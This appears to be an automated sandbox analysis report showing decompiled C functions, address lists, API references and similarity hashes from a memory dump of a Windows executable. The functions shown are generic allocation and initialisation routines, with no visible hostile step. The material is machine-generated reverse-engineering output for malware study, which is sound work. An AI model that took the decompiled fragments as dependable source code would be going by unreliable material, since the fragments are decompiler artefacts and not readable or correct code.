    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 8b38522294903ccd3d0ca301d0f16719a14e2a774e4708824bca31c353132f97
    • Instruction ID: f9a8ff2e246b6649db0619e7a566e5f760b05c1461e994258e896da4b1470c76
    • Opcode Fuzzy Hash: 8b38522294903ccd3d0ca301d0f16719a14e2a774e4708824bca31c353132f97
    • Instruction Fuzzy Hash: 24B1EE70A04646AFEF28CF78C488BB9FBA5FF81714F144259E465D3281CB71A960CBD1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0083825A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
    				void* __esi;
    				void* _t47;
    				signed int _t50;
    				signed int _t51;
    				void* _t53;
    				signed int _t55;
    				signed int _t80;
    				void* _t89;
    				void* _t91;
    				intOrPtr _t93;
    				void* _t95;
    				void* _t98;
    
    				_t98 = __eflags;
    				_t90 = __edi;
    				_t88 = __edx;
    				E0084D8C4(E00861356, __ecx);
    				E0084D9C0();
    				_t93 = __ecx;
    				_t1 = _t95 - 0x9d58; // -38232
    				E0083136E(_t1, __edx, __edi, _t98,  *((intOrPtr*)(__ecx + 8)));
    				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
    				_t6 = _t95 - 0x9d58; // -38232
    				if(E00839CB2(_t6, __ecx + 0xf4) != 0) {
    					_t7 = _t95 - 0x9d58; // -38232, executed
    					_t47 = E008319C1(_t7, __edx, 1); // executed
    					if(_t47 != 0) {
    						__eflags =  *((char*)(_t95 - 0x3093));
    						if( *((char*)(_t95 - 0x3093)) == 0) {
    							_push(__edi);
    							_t91 = 0;
    							__eflags =  *(_t95 - 0x30a3);
    							if(__eflags != 0) {
    								_t10 = _t95 - 0x9d3a; // -38202
    								_t11 = _t95 - 0x1010; // -2064
    								_t61 = E0083FAE7(_t11, _t10, 0x800);
    								__eflags =  *(_t95 - 0x309e);
    								while(1) {
    									_t17 = _t95 - 0x1010; // -2064
    									E0083B81F(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
    									_t18 = _t95 - 0x2058; // -6232
    									E00836FEC(_t18);
    									_push(0);
    									_t19 = _t95 - 0x2058; // -6232
    									_t20 = _t95 - 0x1010; // -2064
    									__eflags = E0083A255(_t18, _t88, __eflags, _t20, _t19);
    									if(__eflags == 0) {
    										break;
    									}
    									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
    									asm("adc ebx, [ebp-0x1054]");
    									__eflags =  *(_t95 - 0x309e);
    								}
    								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
    								asm("adc [esi+0x9c], ebx");
    							}
    							_t23 = _t95 - 0x9d58; // -38232
    							E008383F2(_t93, _t88, _t95, __eflags, _t23);
    							_t50 =  *(_t93 + 8);
    							_t89 = 0x49;
    							_pop(_t90);
    							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
    							__eflags = _t80 - 0x54;
    							if(_t80 == 0x54) {
    								L11:
    								 *((char*)(_t50 + 0x61f9)) = 1;
    							} else {
    								__eflags = _t80 - _t89;
    								if(_t80 == _t89) {
    									goto L11;
    								}
    							}
    							_t51 =  *(_t93 + 8);
    							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
    							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
    								__eflags =  *((char*)(_t51 + 0x61f9));
    								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
    								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
    								E00840FE5((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
    							}
    							_t33 = _t95 - 0x9d58; // -38232, executed
    							E00831E9F(_t33, _t89, _t93);
    							do {
    								_t34 = _t95 - 0x9d58; // -38232
    								_t53 = E00833A2C(_t34, _t89);
    								_t35 = _t95 - 0xd; // 0x7f3
    								_t36 = _t95 - 0x9d58; // -38232
    								_t55 = E00838458(_t93, _t36, _t53, _t35); // executed
    								__eflags = _t55;
    							} while (_t55 != 0);
    						}
    					} else {
    						E00836F18(0x8700e0, 1);
    					}
    				}
    				_t37 = _t95 - 0x9d58; // -38232, executed
    				E0083161E(_t37, _t90, _t93); // executed
    				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
    				return 0;
    			}















    0x0083825a
    0x0083825a
    0x0083825a
    0x0083825f
    0x00838269
    0x0083826f
    0x00838271
    0x0083827a
    0x0083827f
    0x0083828a
    0x00838297
    0x0083829f
    0x008382a5
    0x008382ac
    0x008382bf
    0x008382c6
    0x008382cd
    0x008382d0
    0x008382d2
    0x008382d8
    0x008382df
    0x008382e6
    0x008382ed
    0x008382f2
    0x0083830d
    0x00838319
    0x00838320
    0x00838325
    0x0083832b
    0x00838330
    0x00838332
    0x00838339
    0x00838345
    0x00838347
    0x00000000
    0x00000000
    0x008382fa
    0x00838300
    0x00838306
    0x00838306
    0x00838349
    0x0083834f
    0x0083834f
    0x00838355
    0x0083835e
    0x00838363
    0x00838368
    0x00838369
    0x0083836a
    0x00838372
    0x00838375
    0x0083837c
    0x0083837c
    0x00838377
    0x00838377
    0x0083837a
    0x00000000
    0x00000000
    0x0083837a
    0x00838383
    0x00838386
    0x0083838d
    0x0083838f
    0x0083839d
    0x0083839d
    0x008383a4
    0x008383a4
    0x008383a9
    0x008383af
    0x008383b4
    0x008383b4
    0x008383ba
    0x008383bf
    0x008383c4
    0x008383cd
    0x008383d2
    0x008383d2
    0x008383b4
    0x008382ae
    0x008382b5
    0x008382b5
    0x008382ac
    0x008383d6
    0x008383dc
    0x008383e7
    0x008383f1

    APIs
    • __EH_prolog.LIBCMT ref: 0083825F
      • Part of subcall function 0083136E: __EH_prolog.LIBCMT ref: 00831373
      • Part of subcall function 0083136E: new.LIBCMT ref: 008313EB
      • Part of subcall function 008319C1: __EH_prolog.LIBCMT ref: 008319C6
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 3c3568485cb60c42a7107978a6dc7d6ca309b4fb2443aa5cf705446bf6bc2f32
    • Instruction ID: 8838d67d396e04f86bfe3c05f57ac9e0af96bd27470d147de4a4f1f38d784143
    • Opcode Fuzzy Hash: 3c3568485cb60c42a7107978a6dc7d6ca309b4fb2443aa5cf705446bf6bc2f32
    • Instruction Fuzzy Hash: 6741B3719006589ADB20EB64C855BEAB7A8FF90704F0404EAF58AD3242EF745EC8DB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E00842AF2(void* __ecx, void* __edx) {
    				void* __edi;
    				void* __esi;
    				void* _t29;
    				signed int _t30;
    				signed int* _t36;
    				signed int _t38;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				signed int _t44;
    				void* _t47;
    				void* _t60;
    				signed int _t65;
    				void* _t67;
    				void* _t69;
    				void* _t73;
    
    				_t29 = E0084D8C4(E00861514, __ecx);
    				_push(__ecx);
    				_push(__ecx);
    				_t60 = __ecx;
    				_t44 = 0;
    				_t72 =  *((intOrPtr*)(__ecx + 0x20));
    				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
    					_push(0x400400); // executed
    					_t42 = E0084DB5F(__ecx, __edx, 0x400400, _t72); // executed
    					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
    					_t29 = E0084E920(__ecx, _t42, 0, 0x400400);
    					_t69 = _t69 + 0x10;
    				}
    				_t73 =  *(_t60 + 0x18) - _t44;
    				if(_t73 == 0) {
    					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
    					_t30 = _t65;
    					 *(_t67 - 0x10) = _t65;
    					_t58 = _t30 * 0x4ae4 >> 0x20;
    					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004); // executed
    					_t36 = E0084DB5F(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73); // executed
    					_pop(0x8700e0);
    					 *(_t67 - 0x14) = _t36;
    					 *(_t67 - 4) = _t44;
    					_t74 = _t36;
    					if(_t36 != 0) {
    						_push(E008417FB);
    						_push(E00841639);
    						_push(_t65);
    						_t16 =  &(_t36[1]); // 0x4
    						_t44 = _t16;
    						 *_t36 = _t65;
    						_push(0x4ae4);
    						_push(_t44);
    						E0084D9ED(_t58, _t74);
    					}
    					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
    					 *(_t60 + 0x18) = _t44;
    					_t29 = E0084E920(_t60, _t44, 0, _t65 * 0x4ae4);
    					if(_t65 != 0) {
    						_t38 = 0;
    						 *(_t67 - 0x10) = 0;
    						do {
    							_t47 =  *(_t60 + 0x18) + _t38;
    							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
    								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
    								_t39 = E00852BB3(0x8700e0); // executed
    								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
    								0x8700e0 = 0x30c00;
    								if(_t39 == 0) {
    									E00836E54(0x8700e0);
    								}
    								_t38 =  *(_t67 - 0x10);
    							}
    							_t38 = _t38 + 0x4ae4;
    							 *(_t67 - 0x10) = _t38;
    							_t65 = _t65 - 1;
    						} while (_t65 != 0);
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
    				return _t29;
    			}


















    0x00842af7
    0x00842afc
    0x00842afd
    0x00842b01
    0x00842b03
    0x00842b05
    0x00842b08
    0x00842b0f
    0x00842b10
    0x00842b18
    0x00842b1b
    0x00842b20
    0x00842b20
    0x00842b23
    0x00842b26
    0x00842b31
    0x00842b38
    0x00842b3a
    0x00842b3d
    0x00842b52
    0x00842b53
    0x00842b58
    0x00842b59
    0x00842b5c
    0x00842b5f
    0x00842b61
    0x00842b63
    0x00842b68
    0x00842b6d
    0x00842b6e
    0x00842b6e
    0x00842b71
    0x00842b73
    0x00842b78
    0x00842b79
    0x00842b79
    0x00842b7e
    0x00842b88
    0x00842b8f
    0x00842b99
    0x00842b9b
    0x00842b9d
    0x00842ba0
    0x00842ba3
    0x00842bac
    0x00842bb3
    0x00842bbd
    0x00842bc2
    0x00842bc8
    0x00842bcb
    0x00842bd2
    0x00842bd2
    0x00842bd7
    0x00842bd7
    0x00842bda
    0x00842bdf
    0x00842be2
    0x00842be2
    0x00842ba0
    0x00842b99
    0x00842bed
    0x00842bf7

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 853c8e26e4e0a58f5ec66e74212c54c550f7ae0104484af9818c9bdef84d07fb
    • Instruction ID: 463e1edea1b0cf9a7299883d8888da22904bd367b7805a3224fceda5c244518c
    • Opcode Fuzzy Hash: 853c8e26e4e0a58f5ec66e74212c54c550f7ae0104484af9818c9bdef84d07fb
    • Instruction Fuzzy Hash: B421E6B1E40219ABDB049F78CC45B6ABB68FB14324F04063AF909EB681D7749940C6E9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00849F62(void* __ecx, void* __edx, void* __eflags) {
    				void* __edi;
    				void* __esi;
    				short _t33;
    				char _t36;
    				short _t55;
    				void* _t58;
    				short _t60;
    				void* _t62;
    				intOrPtr _t64;
    				void* _t67;
    
    				_t67 = __eflags;
    				_t57 = __edx;
    				E0084D8C4(E0086156F, __ecx);
    				_push(__ecx);
    				E0084D9C0();
    				_push(_t60);
    				_push(_t58);
    				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
    				 *((intOrPtr*)(_t62 - 4)) = 0;
    				E0083136E(_t62 - 0x7d24, __edx, _t58, _t67, 0); // executed
    				 *((char*)(_t62 - 4)) = 1;
    				E00831EEE(_t62 - 0x7d24, __edx, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
    				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
    					 *((intOrPtr*)(_t62 - 0x24)) = 0;
    					 *((intOrPtr*)(_t62 - 0x20)) = 0;
    					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
    					 *((intOrPtr*)(_t62 - 0x18)) = 0;
    					 *((char*)(_t62 - 0x14)) = 0;
    					 *((char*)(_t62 - 4)) = 2;
    					_push(_t62 - 0x24);
    					_t50 = _t62 - 0x7d24;
    					_t33 = E00831906(_t62 - 0x7d24, _t57, _t60); // executed
    					__eflags = _t33;
    					if(_t33 != 0) {
    						_t60 =  *((intOrPtr*)(_t62 - 0x20));
    						_t58 = _t60 + _t60;
    						_push(_t58 + 2);
    						_t55 = E00852BB3(_t50);
    						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
    						__eflags = _t55;
    						if(_t55 != 0) {
    							__eflags = 0;
    							 *((short*)(_t58 + _t55)) = 0;
    							E0084EA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
    						} else {
    							_t60 = 0;
    						}
    						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
    					}
    					E008315D4(_t62 - 0x24);
    					E0083161E(_t62 - 0x7d24, _t58, _t60); // executed
    					_t36 = 1;
    				} else {
    					E0083161E(_t62 - 0x7d24, _t58, _t60);
    					_t36 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
    				return _t36;
    			}













    0x00849f62
    0x00849f62
    0x00849f67
    0x00849f6c
    0x00849f72
    0x00849f78
    0x00849f79
    0x00849f7c
    0x00849f86
    0x00849f89
    0x00849f97
    0x00849f9b
    0x00849fa6
    0x00849fb7
    0x00849fba
    0x00849fbd
    0x00849fc0
    0x00849fc3
    0x00849fc9
    0x00849fcd
    0x00849fce
    0x00849fd4
    0x00849fd9
    0x00849fdb
    0x00849fdd
    0x00849fe0
    0x00849fe6
    0x00849fed
    0x00849ff2
    0x00849ff4
    0x00849ff6
    0x00849ffc
    0x00849fff
    0x0084a007
    0x00849ff8
    0x00849ff8
    0x00849ff8
    0x0084a012
    0x0084a012
    0x0084a017
    0x0084a022
    0x0084a027
    0x00849fa8
    0x00849fae
    0x00849fb3
    0x00849fb3
    0x0084a02e
    0x0084a039

    APIs
    • __EH_prolog.LIBCMT ref: 00849F67
      • Part of subcall function 0083136E: __EH_prolog.LIBCMT ref: 00831373
      • Part of subcall function 0083136E: new.LIBCMT ref: 008313EB
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 60c44a1206e74affe3abfe3c2430e705d3d406a378c0cf508604876b7e1eca6c
    • Instruction ID: b35393114f33184fbbbe5f61218c0e81cf3445aed56914540017d32d1156290f
    • Opcode Fuzzy Hash: 60c44a1206e74affe3abfe3c2430e705d3d406a378c0cf508604876b7e1eca6c
    • Instruction Fuzzy Hash: 60216D71D0425DDACF14DF98D9815EEBBB4FF59304F0004AAE809E7202DB356E05DBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E008391A3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
    				void* _t21;
    				intOrPtr _t22;
    				intOrPtr _t27;
    				void* _t36;
    				intOrPtr _t38;
    				intOrPtr _t41;
    				void* _t43;
    				void* _t50;
    
    				_t36 = __edx;
    				E0084D8C4(E008613A5, __ecx);
    				E0083134C(_t43 - 0x20, E00837CD8());
    				_push( *((intOrPtr*)(_t43 - 0x1c)));
    				_push( *((intOrPtr*)(_t43 - 0x20)));
    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
    				_t41 = E0083C7AC();
    				if(_t41 > 0) {
    					_t27 =  *((intOrPtr*)(_t43 + 0x10));
    					_t38 =  *((intOrPtr*)(_t43 + 0xc));
    					do {
    						_t22 = _t41;
    						asm("cdq");
    						_t50 = _t36 - _t27;
    						if(_t50 > 0 || _t50 >= 0 && _t22 >= _t38) {
    							_t41 = _t38;
    						}
    						if(_t41 > 0) {
    							E0083C964( *((intOrPtr*)(_t43 + 8)), _t43,  *((intOrPtr*)(_t43 - 0x20)), _t41);
    							asm("cdq");
    							_t38 = _t38 - _t41;
    							asm("sbb ebx, edx");
    						}
    						_push( *((intOrPtr*)(_t43 - 0x1c)));
    						_push( *((intOrPtr*)(_t43 - 0x20)));
    						_t41 = E0083C7AC();
    					} while (_t41 > 0);
    				}
    				_t21 = E0083158D(_t43 - 0x20); // executed
    				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
    				return _t21;
    			}











    0x008391a3
    0x008391a8
    0x008391ba
    0x008391bf
    0x008391c5
    0x008391c8
    0x008391d1
    0x008391d5
    0x008391d8
    0x008391dc
    0x008391df
    0x008391df
    0x008391e1
    0x008391e2
    0x008391e4
    0x008391ec
    0x008391ec
    0x008391f0
    0x008391f9
    0x00839200
    0x00839201
    0x00839203
    0x00839203
    0x00839205
    0x0083920b
    0x00839213
    0x00839215
    0x0083921a
    0x0083921e
    0x00839227
    0x00839231

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 85065f6acd5f6bdc4ab0f442112ec6a08d983bb3d9c9b4b564c77cf5dc4244a5
    • Instruction ID: 8b028727187379e1b9b0fcd9a1233aa976d369f08e336bc0003fc2ed14c6f0f7
    • Opcode Fuzzy Hash: 85065f6acd5f6bdc4ab0f442112ec6a08d983bb3d9c9b4b564c77cf5dc4244a5
    • Instruction Fuzzy Hash: 9B115A77E00529ABCF22AAACCC559EEB736FBC8710F014126F815F7252CA798D1087E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0084C755(void* __ecx, void* __edx, void* __eflags) {
    				void* __ebx;
    				intOrPtr _t18;
    				char _t19;
    				char _t20;
    				void* _t23;
    				void* _t24;
    				void* _t37;
    				void* _t43;
    				intOrPtr _t45;
    
    				_t37 = __edx;
    				E0084D8C4(E008615AE, __ecx);
    				_push(__ecx);
    				E0084D9C0();
    				_push(_t24);
    				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
    				E00854DC3(0x8839fa, "X");
    				E0083FB3E(0x885a1c, _t37, 0x8622e0);
    				E00854DC3(0x884a1a,  *((intOrPtr*)(_t43 + 0xc)));
    				E00835BAF(0x87b708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
    				_t4 = _t43 - 4;
    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
    				_t18 = 2;
    				 *0x8829d8 = _t18;
    				 *0x8829d4 = _t18;
    				 *0x8829d0 = _t18;
    				_t19 =  *0x8775f1; // 0x0
    				 *0x88185b = _t19;
    				_t20 =  *0x8775f2; // 0x1
    				 *0x881894 = 1;
    				 *0x881897 = 1;
    				 *0x88185c = _t20;
    				E00837B7B(_t43 - 0x2108, _t37,  *_t4, 0x87b708);
    				 *(_t43 - 4) = 1;
    				E00837CF1(_t43 - 0x2108, _t37,  *_t4);
    				_t23 = E00837C0D(_t24, _t43 - 0x2108, _t37); // executed
    				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
    				return _t23;
    			}












    0x0084c755
    0x0084c75a
    0x0084c75f
    0x0084c765
    0x0084c76a
    0x0084c76d
    0x0084c77a
    0x0084c78b
    0x0084c798
    0x0084c7a9
    0x0084c7ae
    0x0084c7ae
    0x0084c7ba
    0x0084c7bb
    0x0084c7c0
    0x0084c7c5
    0x0084c7ca
    0x0084c7cf
    0x0084c7d4
    0x0084c7da
    0x0084c7e1
    0x0084c7e8
    0x0084c7ed
    0x0084c7f8
    0x0084c7fc
    0x0084c807
    0x0084c811
    0x0084c81c

    APIs
    • __EH_prolog.LIBCMT ref: 0084C75A
      • Part of subcall function 00837B7B: __EH_prolog.LIBCMT ref: 00837B80
      • Part of subcall function 00837B7B: new.LIBCMT ref: 00837BC4
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: aab9fe9c7c6f6e70dff33cca1514929a0482945302e15bf6f6bb8f8eb192e17e
    • Instruction ID: 5e18f2671b966d89ac6209f5126cd5ac2610d08e4a84b10904e0e8c5eb7db56e
    • Opcode Fuzzy Hash: aab9fe9c7c6f6e70dff33cca1514929a0482945302e15bf6f6bb8f8eb192e17e
    • Instruction Fuzzy Hash: 5E11EB71508244AED704EB5CDC1BBDC7FB4FB65310F0001AAF419E6283DBB50685CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0085B136(void* __edx, void* __esi, void* __eflags) {
    				intOrPtr _v12;
    				void* __ecx;
    				char _t16;
    				void* _t17;
    				void* _t26;
    				void* _t28;
    				void* _t31;
    				char _t32;
    				void* _t34;
    				intOrPtr* _t36;
    
    				_push(_t26);
    				_push(_t26);
    				_t16 = E00857B91(_t26, 0x40, 0x30); // executed
    				_t32 = _t16;
    				_v12 = _t32;
    				_t28 = _t31;
    				if(_t32 != 0) {
    					_t2 = _t32 + 0xc00; // 0xc00
    					_t17 = _t2;
    					__eflags = _t32 - _t17;
    					if(__eflags != 0) {
    						_t3 = _t32 + 0x20; // 0x20
    						_t36 = _t3;
    						_t34 = _t17;
    						do {
    							_t4 = _t36 - 0x20; // 0x0
    							E00859C5D(_t28, _t36, __eflags, _t4, 0xfa0, 0);
    							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
    							 *_t36 = 0;
    							_t36 = _t36 + 0x30;
    							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
    							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
    							 *((char*)(_t36 - 0x24)) = 0xa;
    							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
    							 *((char*)(_t36 - 0x22)) = 0;
    							__eflags = _t36 - 0x20 - _t34;
    						} while (__eflags != 0);
    						_t32 = _v12;
    					}
    				} else {
    					_t32 = 0;
    				}
    				E00857AC6(0);
    				return _t32;
    			}













    0x0085b13b
    0x0085b13c
    0x0085b143
    0x0085b148
    0x0085b14c
    0x0085b150
    0x0085b153
    0x0085b159
    0x0085b159
    0x0085b15f
    0x0085b161
    0x0085b164
    0x0085b164
    0x0085b167
    0x0085b169
    0x0085b16f
    0x0085b173
    0x0085b178
    0x0085b17c
    0x0085b17e
    0x0085b181
    0x0085b187
    0x0085b18e
    0x0085b192
    0x0085b196
    0x0085b199
    0x0085b199
    0x0085b19d
    0x0085b1a0
    0x0085b155
    0x0085b155
    0x0085b155
    0x0085b1a2
    0x0085b1af

    APIs
      • Part of subcall function 00857B91: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0085859F,00000001,00000364,?,00852E6F,?,?,008700E0), ref: 00857BD2
    • _free.LIBCMT ref: 0085B1A2
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 43862b2291c0c1e582d332359441da1e8c9a88ae3b8bef17d846f6759a6f0a85
    • Instruction ID: 24267ee0db23ed822c985fbe794a0fd77ce605fa2be0764e705a2be30745658a
    • Opcode Fuzzy Hash: 43862b2291c0c1e582d332359441da1e8c9a88ae3b8bef17d846f6759a6f0a85
    • Instruction Fuzzy Hash: CC012672240304ABE331CE69DC8195AFBD9FB95371F25052DE994C3280EB30A8098A65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0083A7CC(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
    				intOrPtr _v8;
    				void* __esi;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t15;
    				intOrPtr _t16;
    				intOrPtr* _t22;
    
    				_push(__ecx);
    				_t22 = __ecx;
    				_t24 =  *((intOrPtr*)(__ecx + 8));
    				if( *((intOrPtr*)(__ecx + 8)) == 0) {
    					_t15 = E0084D880(__edx, __ecx, _t24, 0xb54); // executed
    					_v8 = _t15;
    					_t25 = _t15;
    					if(_t15 == 0) {
    						_t16 = 0;
    						__eflags = 0;
    					} else {
    						_t16 = E0083A65F(_t15, _t25);
    					}
    					 *((intOrPtr*)(_t22 + 8)) = _t16;
    				}
    				_t12 = _a4;
    				 *_t22 = _t12;
    				if(_t12 == 1) {
    					 *(_t22 + 4) =  *(_t22 + 4) & 0x00000000;
    				}
    				if(_t12 == 2) {
    					 *(_t22 + 4) =  *(_t22 + 4) | 0xffffffff;
    				}
    				if(_t12 == 3) {
    					E00835908( *((intOrPtr*)(_t22 + 8)));
    				}
    				_t13 = _a8;
    				if(_t13 >= 8) {
    					_t13 = 8;
    				}
    				 *((intOrPtr*)(_t22 + 0x10)) = _t13;
    				return _t13;
    			}










    0x0083a7cf
    0x0083a7d1
    0x0083a7d3
    0x0083a7d7
    0x0083a7de
    0x0083a7e3
    0x0083a7e7
    0x0083a7e9
    0x0083a7f4
    0x0083a7f4
    0x0083a7eb
    0x0083a7ed
    0x0083a7ed
    0x0083a7f6
    0x0083a7f6
    0x0083a7f9
    0x0083a7fc
    0x0083a801
    0x0083a803
    0x0083a803
    0x0083a80a
    0x0083a80c
    0x0083a80c
    0x0083a813
    0x0083a818
    0x0083a818
    0x0083a81d
    0x0083a823
    0x0083a827
    0x0083a827
    0x0083a828
    0x0083a82f

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
